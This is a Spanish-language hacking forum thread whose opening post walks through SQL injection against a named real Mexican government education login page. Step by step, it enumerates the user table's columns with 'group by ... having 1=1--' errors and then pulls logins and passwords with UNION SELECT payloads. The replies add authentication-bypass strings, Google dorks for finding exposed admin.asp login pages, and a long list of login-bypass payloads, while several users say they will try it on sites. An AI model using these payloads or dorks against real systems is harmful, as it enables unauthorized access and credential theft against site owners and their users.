Inyección SQL a Login ASP

  • 7 Respuestas
  • 5606 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Stuxnet

  • *
  • Underc0der
  • Mensajes: 261
  • Actividad:
    0%
  • Reputación 2
  • Twitter: _stuxnet
    • Ver Perfil
    • Devel Security

Inyección SQL a Login ASP

  • en: Marzo 10, 2013, 11:13:28 pm

Bien comencemos, para este tutorial utizare la página de http://informaticaeducacion.nl.gob.mx/saci/login.asp

Este tutorial es con fines educativos y no me hago responsable del uso que le den.

En el en campo "Clave de Acceso" y "Password" del login escribimos:

Código: [Seleccionar]
' having 1= 1--

Al hacerlo nos dara el seguiente error:


Sabemos que es vulnerable y nos acaba de dar el nombre de la tabla y la columna "Usuario.Clave, teniendo esto regresamos a nuestro login y escribimos:

Código: [Seleccionar]
' group by Usuario.Clave having 1 = 1--
Hacemos la inyección y el siguiente error sera así:


Nos acaba de dar el nombre de la tabla y la columna "Usuario.Nombre", teniendo esto regresamos a nuestro login y escribimos:

Código: [Seleccionar]
' group by Usuario.Clave, Usuario.Nombre having 1=1--
Hacemos la inyección y el siguiente error sera así:


Nos acaba de dar el nombre de la tabla y la columna "Usuario.Clave_de_Acceso", teniendo esto regresamos a nuestro login y escribimos:

Código: [Seleccionar]
' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso having 1=1--
Hacemos la inyección y el siguiente error sera así:


Nos acaba de dar el nombre de la tabla y la columna "Usuario.Password", teniendo esto regresamos a nuestro login y escribimos:

Código: [Seleccionar]
' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password having 1=1--
Hacemos la inyección y el siguiente error sera así:


Nos acaba de dar el nombre de la tabla y la columna "Usuario.Tipo_de_Usuario", teniendo esto regresamos a nuestro login y escribimos:

Código: [Seleccionar]
' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password, Usuario.Tipo_de_Usuario having 1=1--
Hacemos la inyección y el siguiente error sera así:



Nos acaba de dar el nombre de la tabla y la columna "Usuario.Tunto_de_Captura", teniendo esto regresamos a nuestro login y escribimos:

Código: [Seleccionar]
' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password, Usuario.Tipo_de_Usuario, Usuario.Punto_de_Captura having 1=1--

Hacemos la inyección y el siguiente error sera así:


Nos acaba de dar el nombre de la tabla y la columna "Usuario.ESTATUS", teniendo esto regresamos a nuestro login y escribimos:

Código: [Seleccionar]
' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password, Usuario.Tipo_de_Usuario, Usuario.Punto_de_Captura, Usuario.ESTATUS having 1=1--
Como podemos observar al hacer esto nos dira "clave de acceso y/o password incorrectos" esto quiere decir que hemos terminado de buscar las tablas y columnas.


Nuestra siguiente inyección sera de esta forma:

Código: [Seleccionar]
' union select 1,1,1,1,1,1,min(Clave_de_Acceso) from Usuario where Clave_de_Acceso > 'a'--
Esta parte tenemos 6 unos y min(LOGIN) es la posición al hacer la inyección les arroja los datos.

La posión de los unos puede varia un ejemplo podría ser:

Código: [Seleccionar]
' union select 1,1,1,1,min(Clave_de_Acceso)1,1 from Usuario where Clave_de_Acceso > 'a'--

Curiosamente al hacer la inyección de esta forma tenemos el acceso:

Código: [Seleccionar]
' union select 1,1,1,1,1,1,min(Password) from Usuario where Clave_de_Acceso > 'ADMIN'--


La inyección para que les arroje la password es:

Código: [Seleccionar]
' union select 1,1,1,1,1,1,min(Password) from Usuario where Password > 'ADMIN'--
« Última modificación: Junio 13, 2013, 06:44:26 pm por Stuxnet »

Desconectado Hu0r

  • *
  • Underc0der
  • Mensajes: 37
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:Inyección SQL a Login ASP

  • en: Marzo 11, 2013, 02:18:20 am
Buen post. Traté con una web y al momento de usar

Código: [Seleccionar]
' union select 1,1,1,1,min(xxxx) from yyyyy where xxxx > 'a'--
Al poner ese código (con los respectivos datos), no puedo acceder (el número de columnas es correcto, o sino sale un error). Simplemente carga de nuevo el login. No me da el error que aparece ahí. También probé en cambiar el min(xxxx) a todas las posiciones de los 1's y nada. ¿Alguna idea?

Desconectado s0ul0fh4ck

  • *
  • Underc0der
  • Mensajes: 8
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:Inyección SQL a Login ASP

  • en: Marzo 11, 2013, 06:34:40 pm
jojo! gracias por compartir.

ahora toca probar.!

Desconectado zoro248

  • *
  • Underc0der
  • Mensajes: 239
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email

Re:Inyección SQL a Login ASP

  • en: Marzo 11, 2013, 09:36:29 pm
Execelente tuto, desde ya a ponerlo en practica xD

Desconectado k43l

  • *
  • Underc0der
  • Mensajes: 119
  • Actividad:
    0%
  • Reputación 0
  • white & black hacking
    • Ver Perfil
    • White And Black Hacking

Re:Inyección SQL a Login ASP

  • en: Marzo 12, 2013, 05:01:45 pm
existen otras consultas sql que le puedes meter a los campos de texto para bypassear y en este caso se esta descubriendo solamente los campos de una sola tabla y no de varias como mencionas, la tabla seria "Usuario", queria hacer esa aclaración
salu2
« Última modificación: Marzo 12, 2013, 05:05:12 pm por k43l »




"Mess with the best, die like the rest"

Desconectado [3V1L]

  • *
  • Underc0der
  • Mensajes: 18
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:Inyección SQL a Login ASP

  • en: Marzo 17, 2013, 02:44:21 am
Prueba con esto :
                           user:'1 or '1'='1
                            password:'1 or '1'='1

Desconectado OverHoax

  • *
  • Underc0der
  • Mensajes: 28
  • Actividad:
    0%
  • Reputación 0
  • Gamer - Programmer - Ghat
  • Skype: OverHoax
    • Ver Perfil
    • OverHoax

Re:Inyección SQL a Login ASP

  • en: Marzo 30, 2013, 04:23:39 pm
Prueba con esto :
                           user:'1 or '1'='1
                            password:'1 or '1'='1

Esa Sentencia Es Muy Conocida Se Puede Usar Con El Dork De Google
 
inurl :admin login.asp
inurl :admin.asp

Tambien Funciona

username: admin
password: 'or''='

S2
« Última modificación: Marzo 30, 2013, 04:27:43 pm por OverHoax »
Nunca rechaces aquellos que te aman o se preocupan por ti. Porque algún día entenderás que perdiste la luna mientras contabas las estrellas

Desconectado Ns4

  • *
  • Underc0der
  • Mensajes: 6
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:Inyección SQL a Login ASP

  • en: Marzo 30, 2013, 06:19:15 pm
Prueba con esto :
                           user:'1 or '1'='1
                            password:'1 or '1'='1

Esa Sentencia Es Muy Conocida Se Puede Usar Con El Dork De Google
 
inurl :admin login.asp
inurl :admin.asp

Tambien Funciona

username: admin
password: 'or''='

S2


Citar
admin'--
' OR ''='
'or'
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
- ' or 'x'='x
- ' or 'x'='x
'or'1 ou 'or''='
' or 'x'='x
admin' or 1==1
' OR "='
'or'1'='1

Saludos.
Si Me buscas , Me encontraras.........

 

Strings de SQL para lograr hacer ByPass a un login web

Iniciado por Drok3r

Respuestas: 2
Vistas: 5358
Último mensaje Septiembre 27, 2018, 02:01:18 am
por Drok3r
Destripando la logica de una inyeccion [Mysql Doble Query Error Based]

Iniciado por q3rv0

Respuestas: 4
Vistas: 4466
Último mensaje Junio 15, 2013, 11:08:53 am
por morodog
Subir Shell a través de Inyección SSI (Server-side include)

Iniciado por CalebBucker

Respuestas: 7
Vistas: 6020
Último mensaje Junio 23, 2012, 08:44:07 am
por s3cur1tyr00t
Sqlsus 0.2 Liberado - Inyección de MySQL y Adquisición de herramientas.

Iniciado por dracko.rx

Respuestas: 0
Vistas: 2974
Último mensaje Febrero 24, 2010, 03:08:27 pm
por dracko.rx
Inyección SQLi Manual Metodo (POST)

Iniciado por OswireW0rding

Respuestas: 3
Vistas: 4898
Último mensaje Marzo 16, 2014, 11:59:48 pm
por Snifer